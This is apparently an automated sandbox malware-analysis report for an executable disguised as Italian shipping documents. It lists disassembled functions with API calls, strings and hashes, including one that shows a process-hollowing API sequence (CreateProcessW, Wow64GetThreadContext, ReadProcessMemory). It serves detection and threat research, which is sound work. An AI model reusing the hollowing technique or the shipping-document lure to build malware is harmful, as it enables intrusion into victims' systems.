                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: 1ZSE23N7L85REHSCPIYG0EV3B6
                        • API String ID: 2694422964-4122735209
                        • Opcode ID: f31ffd3c437ed063efcf0e105f079c6686eb2210787c29c8662d6fcdfb45ab26
                        • Instruction ID: 4701e390d0bc2f5dafd01a3b1af59859bda72ea73bed3a09449706b0fccbfc90
                        • Opcode Fuzzy Hash: f31ffd3c437ed063efcf0e105f079c6686eb2210787c29c8662d6fcdfb45ab26
                        • Instruction Fuzzy Hash: F251A131D04388EAEF12CBE4C854BDEBB79AF15304F044189E2497B2C1D7B91B48CBA5
                        Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • _wcsncpy.LIBCMT ref: 00401C41
                        • _wcscpy.LIBCMT ref: 00401C5D
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                        • String ID: Line:
                        • API String ID: 1874344091-1585850449
                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                        Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Close$OpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 1607946009-824357125
                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                        Function 041702B0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 04170A6B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04170B01
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04170B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                        • Instruction ID: 887e5b755dc16258ae0238b99a8f01c14f1b715cf8199885113eb81fcf78362d
                        • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                        • Instruction Fuzzy Hash: AF62FC30A14658DBEB24CFA4C890BDEB776EF58300F1091A9D10DEB394E775AE81CB59
                        Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                        • _free.LIBCMT ref: 004295A0
                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                        • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 3938964917-212169066
                        • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                        • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                        Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: Error:
                        • API String ID: 4104443479-232661952
                        • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                        • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                        Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                        • String ID: X$pWH
                        • API String ID: 85490731-941433119
                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                        Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • _memmove.LIBCMT ref: 00401B57
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                        • String ID: @EXITCODE
                        • API String ID: 2734553683-3436989551
                        • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                        • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                        Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                        Download Yara Rule
                        Strings
                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                        • C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, xrefs: 00410107
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _strcat
                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 1765576173-3103797825
                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                        Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                        Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                        • String ID:
                        • API String ID: 1794320848-0
                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                        Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$CurrentTerminate
                        • String ID:
                        • API String ID: 2429186680-0
                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                        Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: IconNotifyShell_
                        • String ID:
                        • API String ID: 1144537725-0
                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                        Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                        Download Yara Rule
                        APIs
                        • _malloc.LIBCMT ref: 0043214B
                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                        • _malloc.LIBCMT ref: 0043215D
                        • _malloc.LIBCMT ref: 0043216F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _malloc$AllocateHeap
                        • String ID:
                        • API String ID: 680241177-0
                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                        Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                        • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                        Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                        Download Yara Rule
                        APIs
                        • __wsplitpath.LIBCMT ref: 004678F7
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLast__wsplitpath_malloc
                        • String ID:
                        • API String ID: 4163294574-0
